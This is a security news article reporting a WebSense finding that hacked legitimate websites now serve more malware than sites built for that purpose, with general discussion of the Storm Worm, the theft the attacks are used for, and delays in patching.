Compromised web sites serve more malware than malicious ones

The fact that legitimate web sites can be compromised and used to distribute malware under an admin's nose is something Ars has touched on of late. In that particular case, the culprit has been a particular type of JavaScript exploit, but the general issue of legitimate web sites serving malware is a growing problem.

According to security firm WebSense, the number of legitimate web sites that have been hacked and are distributing or enabling various types of malware attacks is greater than the number of malicious sites created specifically for that purpose. The company's latest report (PDF) discusses this trend, along with the tremendous impact the Storm Worm had on the 'Net through all of 2007. As WebSense states, there's a clear advantage to infecting a legitimate site that comes with its own built-in traffic and a user base.

The type of theft varies depending on the site. Personal data and credit card information are the most obvious acquisition targets, but online gaming account theft and click-fraud are apparently common as well. It's well known that there are forums, discussion groups, and IRC channels devoted to the topics of which web sites are known to be vulnerable. The problem also runs deeper than simply educating administrators about security vulnerabilities in the software that they use—locating the correct host provider for any particular web space can be difficult, and many sites don't fall off WebSense's malicious site blacklist quickly, sometimes remaining there for weeks or even months after being notified of a problem.

Reports like this highlight the inherent gap between ideal security practices and the real world. Ideally, system admins would be able to easily and quickly install security patches as soon as they became available. Reality, of course, is far more complicated, particularly in a corporate environment. Security updates may need to be carefully vetted before installation to ensure that they don't break anything else—and even this assumes the presence of a system admin with permission to make such decisions without needing a nod from higher up the corporate ladder.

In this case, it's software vendors and web site authors that need to work together and improve their lines of communication in order to discover and deploy updates more quickly than malware authors can discover new ones. Client-side security on any particular system might stop a bug from infecting one particular rig, but it won't help users surfing in from other locations.